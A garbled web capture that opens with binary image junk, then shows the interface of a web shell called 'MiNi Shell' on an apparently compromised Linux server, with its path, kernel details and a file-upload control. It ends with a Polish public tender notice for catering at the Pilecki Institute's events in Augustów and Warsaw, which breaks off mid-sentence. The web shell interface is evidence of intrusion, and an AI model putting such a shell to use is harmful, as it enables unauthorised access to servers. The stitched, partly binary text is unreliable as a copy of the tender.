JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230407/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230407/0016943201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> &#34;Usługi cateringowe na potrzeby wydarzeń organizowanych przez Instytut Solidarności i Męstwa im. Witolda Pileckiego w podziale na dwie części&#34; (Część nr I Augustów, Część nr II Warszawa) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">INSTYTUT SOLIDARNOŚCI I MĘSTWA IMIENIA WITOLDA PILECKIEGO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 369236544</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Foksal 17</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-372</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@instytutpileckiego.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.instytutpileckiego.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> badawcza </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Usługi cateringowe na potrzeby wydarzeń organizowanych przez Instytut Solidarności i Męstwa im. Witolda Pileckiego w podziale na dwie części&#34; (Część nr I Augustów, Część nr II Warszawa) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6b1450a6-d51b-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00169432</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-6b1450a6-d51b-11ed-9355-06954b8c6cb9 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wniosków o dopuszczenie do udziału w postępowaniu, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z 18 lipca 2002 o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344). <br/>2. Środkami komunikacji elektronicznej w postępowaniu są:<br/>1)	platforma prowadzonego postępowania: https://ezamowienia.gov.pl/pl/<br/>2)	poczta elektroniczna: zamowienia@instytutpileckiego.pl.<br/>Korzystanie z Platformy e-Zamówienia jest bezpłatne.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu, z wyłączeniem składania ofert o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”) lub za pośrednictwem poczty elektronicznej.<br/>Zgodnie z art. 63 ust. 2 ustawy w postępowaniu o udzielenie zamówienia ofertę składa się, pod rygorem nieważności, w formie elektronicznej (kwalifikowany podpis elektroniczny) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1 oraz Dz. Urz. UE L 127 z 23.05.2018, s. 2), dalej „RODO”, Zamawiający informuje, że: <br/>1)	administratorem danych osobowych przetwarzanych w związku z prowadzeniem postępowania o udzielenie zamówienia publicznego będzie Instytut Solidarności i Męstwa im. Witolda Pileckiego z siedzibą przy ul. Foksal 17, 00-372 w Warszawie.<br/>2)	kontakt z inspektorem ochrony danych osobowych w Instytucie Solidarności i Męstwa im. Witolda Pileckiego z siedzibą przy ul. Foksal 17, 00-372 w Warszawie lub poprzez e-mail iodo@instytutpileckiego.pl. <br/>3)	Dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego. 4)	odbiorcami danych osobowych Wykonawcy będą:<br/>1)	osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 ust. 6 oraz art. 74 – 76 ustawy Pzp. <br/>2)	Ograniczenie dostępu do danych, o których mowa wyżej może wystąpić jedynie w szczególnych przypadkach jeśli jest to uzasadnione ochroną prywatności zgodnie z art. 18 ust. 5 pkt 1 i 2 ustawy Pzp<br/>5)	Dane osobowe Wykonawcy będą przechowywane przez okres w jakim Zamawiający zobowiązany jest do przechowywania dokumentacji zgodnie z jednolitym rzeczowym wykazem akt obowiązującym w Instytucie Solidarności i Męstwa im. Witolda Pileckiego.<br/>6)	W związku z jawnością postępowania o udzielenie zamówienia publicznego dane mogą być przekazane do państw spoza EOG z zastrzeżeniem, o którym mowa w punkcie 4 pkt. 2<br/>7)	Obowiązek podania przez Wykonawcę danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>8)	W odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>9)	W odniesieniu do danych osobowych w związku z prowadzonym postepowaniem <br/>o udzielenie zamówienia publicznego Wykonawcy przysługują następujące uprawnienie:<br/>1)	na podstawie art. 15 RODO prawo dostępu do swoich danych osobowych oraz otrzymania ich kopii;<br/>2)	na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia swoich danych osobowych;<br/>3)	na podstawie art. 18 prawo do ograniczenia przetwarzania danych osobowych;<br/>4)	na podstawie art. 77 prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych;.<br/>2.	Uprawnienia nieprzysługujące Wykonawcy, związane z przetwarzaniem danych osobowych w odniesieniu do danych pozyskanych w związku z prowadzonym postępowaniem o udzielenie zamówienia publicznego :<br/>1)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>2)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>3)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.26.8.2023.1</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa polegająca na świadczeniu usług cateringowych podczas wydarzeń organizowanych przez Instytut Solidarności i Męstwa im. Witolda Pileckiego Dział w Augustowie w okresie od dnia zawarcia umowy przez okres 12 miesięcy lub do wyczerpania kwoty maksymalnego wynagrodzenia Wykonawcy z tytułu realizacji przedmiotu zamówienia w zależności, które z tych zdarzeń nastąpi wcześniej.<br/><br/>Miejscem realizacji usług jest siedziba Instytutu Pileckiego przy ul. 3 Maja 49, 16-300 Augustów lub teren miasta Augustów w lokalizacjach, w których Zamawiający organizować będzie wydarzenia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55321000-6 - Usługi przygotowywania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55300000-3 - Usługi restauracyjne i dotyczące podawania posiłków</p> <p class="mb-0">55520000-1 - Usługi dostarczania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Prawo opcji<br/>Zakres opcjonalny (zgodnie w warunkami określonymi w Rozdziale II ust. 15 SWZ oraz projektowanymi postanowieniami umowy stanowiącymi załącznik nr 8 A do SWZ)<br/>Zamawiający zastrzega, iż może skorzystać z poniżej opisanego prawa opcji, <br/>tj. dodatkowych usług cateringowych przez co rozumie okoliczność zamówienia jednej usługi lub kilku usług lub maksymalnej ilości przewidzianych ilości usług w obu wariantach (Prawo opcji 1, Prawo opcji 2) lub ich zamówienia niezależnie od siebie lub brak zlecenia zamówienia dodatkowych usług, a Wykonawcy nie przysługują z tego tytułu żadne roszczenia względem Zamawiającego.<br/><br/>1)	Prawo opcji 1 – Lunch -Catering dla grupy 31-49 osób (maksymalnie 12x)<br/>- Zupa wegetariańska (nie może być gotowana na mięsie oraz zawierać mięsa); <br/>- Danie główne<br/>- Danie mięsne, wegetariańskie do wyboru wegetariańskie lub wegańskie; nie mniej niż 300g na porcję (w tym dodatki skrobiowe), surówka lub warzywa gotowane<br/>- Deser - ciasto typu domowego – 150 g / os<br/>- Napoje - Świeżo parzona, gorąca kawa, podawana w samowarze lub w ekspresie <br/>do kawy (do uzgodnienia każdorazowo z Zamawiającym) 300 ml/os.<br/>- Herbata w torebkach minimum 2 rodzaje (w tym czarna i zielona)<br/>- Gorąca woda podawana w samowarze lub termosach (do uzgodnienia każdorazowo <br/>z Zamawiającym) - 300 ml/os.<br/>- Cukier, słodzik – 10g/os.<br/>- Mleko 3,2 % podawane w dzbankach - 50ml/ os.<br/>- Mleko roślinne (sojowe lub owsiane) – dostosowane do liczby uczestników<br/>- Cytryna pokrojona (podawana na talerzykach)- 1 plaster /os.<br/>- Woda podawana w karafkach lub dyspozytorach 0,5l os <br/><br/>2)	Prawo opcji 2 – Przerwa kawowa - Catering dla grupy 50 -100 osób (maksymalnie 5x)<br/>- Świeżo parzona, gorąca kawa, podawana w samowarze lub w ekspresie do kawy <br/>(do uzgodnienia każdorazowo z Zamawiającym) 300 ml/os.<br/>- Herbata w torebkach minimum 3 rodzaje (w tym czarna i zielona)<br/>- Gorąca woda podawana w samowarze lub termosach (do uzgodnienia każdorazowo <br/>z Zamawiającym) - 300 ml/os.<br/>- Cukier, słodzik – 10g/os.<br/>- Mleko 3,2 % podawane w dzbankach - 50ml/ os.<br/>- Mleko roślinne (sojowe lub owsiane) – dostosowane do liczby uczestników (min. 20%)<br/>- Cytryna pokrojona (podawana na talerzykach)- 1 plaster /os.<br/>- 2 rodzaje soków owocowych 100% , podawane w dzbankach szklanych lub dyspozytorach – po 200 ml/os.<br/>- Woda podawana w karafkach lub dyspozytorach min 0,5l os <br/>- przekąski typu finger food z opcją wegetariańską i wegańską do wyboru ( co najmniej 20%)<br/>- Dwa rodzaje ciast do – 150 g / os. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa polegająca na świadczeniu usług cateringowych podczas wydarzeń organizowanych przez Instytut Solidarności i Męstwa im. Witolda Pileckiego Warszawie w okresie od dnia zawarcia umowy przez okres 12 miesięcy lub do wyczerpania kwoty maksymalnego wynagrodzenia Wykonawcy z tytułu realizacji przedmiotu zamówienia w zależności, które z tych zdarzeń nastąpi wcześniej.<br/><br/>Miejscem realizacji usług jest siedziba Instytutu Pileckiego przy ul. Foksal 17, 00-372 Warszawa lub teren Miasta Stołecznego Warszawy w lokalizacjach, w których Zamawiający organizować będzie wydarzenia.<br/>Zamawiający informuje, iż w ramach Prawa opcji nr 2 tj. Lunch w formie bufetu poza Warszawą – catering dla grupy 50 - 100 osób maksymalnie 2 razy, przewiduje organizację wydarzenia na terenie całej Polski. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55321000-6 - Usługi przygotowywania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55300000-3 - Usługi restauracyjne i dotyczące podawania posiłków</p> <p class="mb-0">55520000-1 - Usługi dostarczania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Prawo opcji<br/>Zakres opcjonalny (zgodnie w warunkami określonymi w Rozdziale II ust. 15 SWZ oraz projektowanymi postanowieniami umowy stanowiącymi załącznik nr 8 B do SWZ)<br/>Zamawiający zastrzega, iż może skorzystać z poniżej opisanego prawa opcji, <br/>tj. dodatkowych usług cateringowych przez co rozumie okoliczność zamówienia jednej usługi lub kilku usług lub maksymalnej ilości przewidzianych ilości usług w obu wariantach (Prawo opcji 1, Prawo opcji 2) lub ich zamówienia niezależnie od siebie lub brak zlecenia zamówienia dodatkowych usług, a Wykonawcy nie przysługują z tego tytułu żadne roszczenia względem Zamawiającego.<br/><br/>1) Prawo opcji nr 1 - Serwis kawowy – catering dla grupy 50-100 osób ( maksymalnie 10x) <br/>- Świeżo parzona, gorąca kawa, podawana w samowarze lub w ekspresie do kawy (do uzgodnienia każdorazowo z Zamawiającym) 300 ml/os.<br/>- Herbata w torebkach minimum 3 rodzaje (w tym czarna i zielona)<br/>- Gorąca woda podawana w samowarze lub termosach (do uzgodnienia każdorazowo z Zamawiającym) - 300 ml/os.<br/>- Cukier, słodzik – 10g/os.<br/>- Mleko 3,2 % podawane w dzbankach - 50ml/ os.<br/>- Mleko roślinne (sojowe lub owsiane) – dostosowane do liczby uczestników (min. 20%)<br/>- Cytryna pokrojona (podawana na talerzykach)- 1 plaster /os.<br/>- 2 rodzaje soków owocowych 100% (niedopuszczalny jest nektar lub napój), podawane w dzbankach szklanych lub dyspozytorach – po 200 ml/os.<br/>- Woda podawana w karafkach lub dyspozytorach min 0,5l os <br/>- Dwa Trzy rodzaje ciast do wyboru – 150 g / os<br/>- do wyboru drobne przekąski koktajlowe - minimum 3 rodzaje (w tym, minimum 1 wegetariańska) – co najmniej 100g/osobę. Każdy dodatek powinien zawierać minimum 3 składniki. <br/><br/>2) Prawo opcji nr 2 - Lunch w formie bufetu poza Warszawą – catering dla grupy 50 - 100 osób (maksymalnie 2x)<br/>Zupa <br/>2 zupy do wyboru, w tym jedna wegetariańska rodzaj zupy może się powtarzać w odstępie co najmniej czterech dni – nie mniej niż 200ml/os<br/>Danie główne<br/>Danie mięsne, wegetariańskie do wyboru; nie mniej niż 300g na porcję (w tym dodatki skrobiowe), surówka lub warzywa gotowane<br/>Deser <br/>- ciasto typu domowego, 3 rodzaje – min. 150 g / os<br/>Napoje<br/>- Świeżo parzona, gorąca kawa, podawana w samowarze lub w ekspresie do kawy (do uzgodnienia każdorazowo z Zamawiającym) 300 ml/os.<br/>- Herbata w torebkach minimum 2 rodzaje (w tym czarna i zielona)<br/>- Gorąca woda podawana w samowarze lub termosach (do uzgodnienia każdorazowo z Zamawiającym) - 300 ml/os.<br/>- Cukier, słodzik – 10g/os.<br/>- Mleko 3,2 % podawane w dzbankach - 50ml/ os.<br/>- Mleko roślinne (sojowe lub owsiane) – dostosowane do liczby uczestników<br/>- Cytryna pokrojona (podawana na talerzykach)- 1 plaster /os.<br/>- Woda podawana w karafkach lub dyspozytorach 0,5l os <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamówienia z art. 214 ust. 1 pkt. 7) Ustawy, tj. Zamówienie polegające na powtórzeniu podobnych usług<br/>1)	Przedmiotem zamówienia będzie świadczenie usług cateringowych podczas wydarzeń organizowanych przez Instytut Pileckiego w zależności od potrzeb.<br/>2)	Zamówienie o którym mowa w art. 214 ust. 1 pkt 7) Ustawy, stanowi 20 % wartości zamówienia podstawowego. <br/>3)	Zamówienia na usługi o których mowa w art. 214 ust. 1 pkt 7) zostaną udzielone <br/>na warunkach określonych w niniejszym Opisie Przedmiotu Zamówienia oraz <br/>na warunkach określonych w Projektowanych Postanowieniach Umowy, stanowiących załącznik nr 8 B do SWZ.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> dotyczy tylko Części nr II<br/> b)	w celu potwierdzenia spełnienia warunku w zakresie posiadania zdolności technicznej lub zawodowej, wykonawca zobowiązany jest wykazać, iż w okresie ostatnich 3 lat, a jeżeli okres działalności jest krótszy, w tym okresie wykonał: <br/>co 